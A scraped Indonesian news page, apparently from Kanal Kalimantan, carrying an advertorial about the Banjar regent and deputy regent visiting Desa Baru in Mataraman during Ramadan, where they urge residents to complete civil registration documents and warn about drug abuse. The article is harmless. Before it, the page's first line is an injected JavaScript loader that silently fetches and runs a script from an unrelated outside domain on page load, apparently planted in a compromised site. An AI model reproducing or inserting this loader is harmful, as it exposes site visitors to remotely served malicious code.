(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Advertorial

Warga Desa Baru Mataraman Kali Pertama Dikunjungi Bupati-Wabup Banjar


MARTAPURA, Pertengahan Ramadhan 1439 H, Bupati Banjar KH Khalilurrahman dan Wakil Bupati Banjar H Saidi Mansyur bersama seluruh jajaran SKPD lingkup Pemkab Banjar melakukan Safari Ramadhan ke Desa Baru, Kecamatan Mataraman, Rabu (30/5).

Untuk mencapai desa tersebut diperlukan waktu tempuh kurang lebih 2 jam dari pusat ibukota. Dengan medan cukup berat, tak menyurutkan niat KH Khalilurrahman dan H Saidi Mansyur bersama rombongan untuk bertatap muka langsung dengan warga masyarakat Desa Baru.

Kedatangan mereka disambut gembira oleh masyarakat Desa Baru yang telah menanti dengan berbagai persiapan. Safari Ramadhan pun berlangsung meriah, dari yang muda hingga yang tua berdesakan untuk dapat bersalaman dengan dua pimpinan pemerintahan di Kabupaten Banjar.

Ya, Desa Baru menurut keterangan warga baru pertama kali kedatangan Bupati Banjar dan Wakil Bupati Banjar selama Kabupaten Banjar berdiri.

Safari Ramadhan berlangsung di Masjid Al Muhajirin, Bupati Banjar KH Khalilurrahman mengungkapkan rasa syukur dan bangga dapat melaksanakan buka bersama dengan warga.

“Alhamdulillah, kami bersama jajaran SKPD lingkup Pemkab Banjar dapat melaksanakan Safari Ramadhan yang dirangkai dengan buka bersama warga Desa Baru,” ujar Bupati Banjar.

Bupati Banjar menghimbau warga untuk segera melengkapi KTP, Kartu Keluarga, akte kelahiran, dan administrasi kependudukan lainnya. Menurut Bupati, data administrasi kependudukan tersebut sekarang sangat penting dan dibutuhkan untuk keperluan seperti pendidikan dan kesehatan.

“Setiap warga wajib memiliki data administrasi kependudukan seperti KTP, Kartu Keluarga, akte kelahiran, dan yang lainnya untuk keperluan pendidikan dan kesehatan. Dalam pembuatannya pun kami gratiskan,” jelas KH Khalilurrahman.

Sementara itu, Wakil Bupati Banjar H Saidi Mansyur mengingatkan kepada seluruh masyarakat Kabupaten Banjar khususnya masyarakat Kecamatan Mataraman agar waspada terhadap penyalahgunaan obat-obatan, narkoba serta pengaruh-pengaruh lain yang dapat mengganggu keamanan dan kestabilan kehidupan bermasyarakat.

Keduanya berkesempatan menyerahkan bantuan dan cinderamata kepada sejumlah pengurus masjid dan mushalla yang disaksikan oleh masyarakat Desa Baru. (hendera)

Reporter:Hendera
Editor : Abi Zarrin Al Ghifari

Aldi Riduan

Uploader Terpercaya Kanal Kalimantan

Recent Posts

“Embroidery Mini Class” Perayaan Hari Kartini di Lingkungan PLN UIP3B Kalimantan

KANALKALIMANTAN.COM, BANJARBARU - Memperingati Hari Kartini 2024 PT PLN (Persero) Unit Induk Penyaluran dan Pusat… Read More

9 jam ago

Sejarah Hari Tari Sedunia 29 April

KANALKALIMANTAN.COM – Setiap tanggal 29 April diperingati salah satu seni atau ekspresi diri yang tertua… Read More

12 jam ago

Peringati Hari Tari Sedunia, Ratusan Penari Tampil di Taman Budaya Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Unit Pelaksana Teknis Daerah (UPTD) Taman Budaya Provinsi Kalimantan Selatan (Kalsel) menyelenggarakan… Read More

12 jam ago

Rakerda KNPI Banjarbaru, Rekomendasi Pendirian Gedung Pemuda

KANALKALIMANTAN.COM, BANJARBARU - Dewan Pengurus Daerah (DPD) Komite Nasional Pemuda Indonesia (KNPI) Kota Banjarbaru menggelar… Read More

14 jam ago

Peringati Hari Kartini, PLN Beri Santunan 30 Muslimah Tangguh di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Semangat memperingati Hari Kartini 2024, PT PLN (Persero) Unit Induk Penyaluran dan… Read More

16 jam ago

Konser Malam Pestaforia Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS – “Konser Malam Pestaforia Kapuas 2024” menyemarakan Hari Jadi ke-218 Kota Kuala… Read More

17 jam ago

This website uses cookies.